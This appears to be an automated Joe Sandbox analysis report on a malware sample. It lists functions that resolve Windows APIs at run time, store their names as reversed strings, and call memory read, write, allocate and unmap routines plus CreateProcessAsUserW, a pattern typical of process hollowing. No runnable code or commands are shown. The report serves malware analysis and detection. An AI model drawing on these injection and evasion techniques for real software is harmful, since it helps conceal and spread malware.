                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B08788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B08814
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3130163322-2353454454
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d3725927e27c1d906bbcef463e2de31c160f8e5d6f31057f76a78bd803c2dab4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2b019f1a06ef9506c3e1b71e5a46273e4cb5d8f8295d1b8c5d24151de6a460d8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3725927e27c1d906bbcef463e2de31c160f8e5d6f31057f76a78bd803c2dab4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8411A8B2640248AFEB81EF98DD81F9B7BEDEB4C740F514460BA08D7650CA34FE119B65
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B07A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B07A9F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 19a2c114e9072b3b35d6cfc500457771ada19849f1f982dc705ee9ac76db8257
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ed49a7bfdef02fa44a142538aa5aba61548022b04db600b1e01ed332417c9bf5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a2c114e9072b3b35d6cfc500457771ada19849f1f982dc705ee9ac76db8257
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE116175640208BFEB01EFA5DC81EAFFBADEB4C740F5184A0BA04D7250DE34AE049B64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B07A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B07A9F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2514b5a0e7ad3dc48c4bb8b136c51065d81f2a737dff97de11ec3a028728d9c2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 511aa489e7fc5baebd3bdd93257fcc58093976ed3a14b89808e8e7303d0ea001
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2514b5a0e7ad3dc48c4bb8b136c51065d81f2a737dff97de11ec3a028728d9c2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40116175640208BFEB01EF95DC81EAFFBADEB4C740F5184A0BA04D7250DE34AE049B64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B08400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B08471
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2521977463-737317276
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d3e3087cfbcbee858a2e9975030161531343e53ee542c8f9aa97ee876d9ebbe
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5dab444ea9e80a95a4573a5e3b7baf41d6d1ecacfd995e8610bd136d72663efb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d3e3087cfbcbee858a2e9975030161531343e53ee542c8f9aa97ee876d9ebbe
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50014075640308AFDB41EFA8DC81E5EBBAEEB4D740F518490FA04D7640DA34AE159B64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B07D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2719805696-3542721025
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ca0012ab6d98ca2dc868b04de8ec3e7d6711822b7446f01d824c08fe53568276
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 488183fe44c492b61a5f4bb0b503ecaf3f9821e66115f9815ebc5af57b6cfbea
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca0012ab6d98ca2dc868b04de8ec3e7d6711822b7446f01d824c08fe53568276
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF012975680208AFDB41EF98DC81E9BFBEDEB4D700F518890BA04D7690DA34AE159B64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B08670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B086D5
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3503870465-2520021413
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 17e0971be9dfc44451fdebe9ca169be792f20eb6ad46d6643ec363b019b782aa
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f0b621fcef247e18d78056ebbc7eab88f2b571e4223f25f96ac39ef5423d66c7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17e0971be9dfc44451fdebe9ca169be792f20eb6ad46d6643ec363b019b782aa
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95016734680304AFEB01EFE4DD81E5EBBAEEB4D740F5184A0B60497650DE34BE059A64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlI.N(?,?,00000000,02B0DC7E), ref: 02B0DC2C
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC42
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC61
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Path$DeleteFileNameName_
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4284456518-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d4fe107bfe5a2c9fe3b82d7a836f54cfe0a778ef973eb34b0d101058f7a94a18
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 62918ca99627f18e97a38dbcad77cea01cbd45cec9490d071a909b526390bcf3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4fe107bfe5a2c9fe3b82d7a836f54cfe0a778ef973eb34b0d101058f7a94a18
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76016275A4420A6EEB16DBE09DC1FCD7BB9EB44704F5144D2A200E60C1DAB4AB048B24
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02AF4F2E
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlI.N(?,?,00000000,02B0DC7E), ref: 02B0DC2C
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC42
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF4C60: SysFreeString.OLEAUT32(02B0F4A4), ref: 02AF4C6E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1530111750-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: af966562df0fb6a011d54dfd171e2a7dae4a6305324e611022325109db3cfe28
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 37efae2d61c92d676a59011e463fdee3d0a12f9af4edea5843494dd5b5fb46b5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af966562df0fb6a011d54dfd171e2a7dae4a6305324e611022325109db3cfe28
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E01E17194020DBAEB51EBE0DD92FCEB7ADEB48700F5144A1B605E25D0EA746B048A64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B06DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B06D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B06DB9,?,?,?,00000000), ref: 02B06D99
                                                                                                                                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02B06EAC,00000000,00000000,02B06E2B,?,00000000,02B06E9B), ref: 02B06E17
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
